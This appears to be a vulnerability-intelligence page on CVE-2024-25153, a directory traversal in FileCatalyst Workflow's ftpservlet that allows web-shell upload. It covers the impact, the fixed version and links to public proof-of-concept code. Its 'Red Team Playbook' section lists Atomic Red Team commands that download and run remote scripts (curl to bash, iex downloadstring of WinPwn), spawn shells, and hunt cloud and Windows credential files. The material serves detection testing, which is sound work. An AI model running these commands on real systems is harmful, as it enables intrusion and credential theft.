CVE-2024-25153
Overview
This vulnerability is a directory traversal flaw in the 'ftpservlet' component of the Fortra FileCatalyst Workflow Web Portal. The root cause lies in insufficient validation of file path inputs in a POST request, allowing crafted payloads to escape the intended 'uploadtemp' directory. This improper input sanitization enables unauthorized file uploads to arbitrary locations within the web server's DocumentRoot.
Vulnerability Description
A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.
Impact
An unauthenticated remote attacker can exploit this vulnerability to upload and execute arbitrary JSP code on the FileCatalyst Workflow Web Portal server. This allows full compromise of the affected system, including data theft, service disruption, or establishment of persistent web shells. The attack requires network access to the web portal and no user interaction or privileges, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. This elevates the risk of complete system takeover and lateral movement within the network.
Solution
Fortra has released an updated version 5.1.6.114 of FileCatalyst Workflow addressing this vulnerability, as documented in advisory FI-2024-002 and the associated release notes. Users should upgrade to this patched version immediately to mitigate the issue. Detailed patch instructions and further guidance are available at https://www.fortra.com/security/advisory/fi-2024-002 and https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.114/fcweb_releasenotes.html.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the FileCatalyst Workflow Web Portal arises from a directory traversal flaw within its 'ftpservlet' component. This issue allows an attacker to manipulate file paths in such a way that they can upload files outside the designated 'uploadtemp' directory. By crafting a specific POST request, an attacker can bypass the intended restrictions, leading to the potential placement of malicious files directly into the web portal's DocumentRoot. This misconfiguration not only exposes the system to unauthorized file uploads but also enables the execution of arbitrary code, particularly if the uploaded files are JSP scripts. Such scripts can serve as web shells, granting attackers remote control over the affected server.
Attack vectors for this vulnerability are notably straightforward, leveraging the inherent weaknesses in the file upload mechanism. An attacker could initiate an attack by sending a specially crafted POST request that includes a malicious payload designed to exploit the directory traversal flaw. Once the malicious file is uploaded, it can be executed by accessing it through a web browser, thereby allowing the attacker to execute commands on the server. This exploitation could be further compounded if the server is misconfigured, lacking proper security measures such as input validation, access controls, and execution restrictions on uploaded files. Scenarios may include data exfiltration, service disruption, or lateral movement within the network, depending on the attacker's objectives.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on the FileCatalyst Workflow Web Portal for file transfer and management. A successful exploitation could lead to significant business risks, including data breaches, loss of sensitive information, and reputational damage. The ability to execute arbitrary code on the server can also facilitate further attacks, potentially compromising other systems within the network. The high CVSS score of 9.8 indicates a critical vulnerability, suggesting that organizations must prioritize remediation efforts to mitigate the associated risks. The potential for financial loss, regulatory penalties, and damage to customer trust underscores the importance of addressing this issue promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify weaknesses in the system before they can be exploited. Additionally, employing web application firewalls (WAFs) can provide an additional layer of security by filtering out malicious requests that attempt to exploit the directory traversal flaw. It is also crucial to enforce strict input validation and sanitization practices on all file uploads, ensuring that only allowed file types and sizes are accepted. Furthermore, organizations should configure their servers to restrict the execution of uploaded files, particularly in directories accessible via the web. Regularly updating the FileCatalyst Workflow software and applying security patches can also help mitigate the risk posed by this vulnerability.
In conclusion, the directory traversal vulnerability within the FileCatalyst Workflow Web Portal represents a significant threat to organizations utilizing this software. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortra | Filecatalyst Workflow | All |
cpe:2.3:a:fortra:filecatalyst_workflow:*:*:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:build112:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
nettitude/CVE-2024-25153
Proof-of-concept exploit for CVE-2024-25153.
|
nettitude | 42 | 11 | 2024-03-12 | View |
|
rainbowhatrkn/CVE-2024-25153
Proof-of-concept exploit for CVE-2024-25153.
|
rainbowhatrkn | 0 | 1 | 2024-03-18 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-25153 |
| fortra.com |
GitHub CVE
|
https://www.fortra.com/security/advisory/fi-2024-002 |
| filecatalyst.software |
GitHub CVE
|
https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.114/fcweb_releasenotes.html |
| github.com |
NVD API
|
https://github.com/nettitude/CVE-2024-25153/blob/master/CVE-2024-25153.py |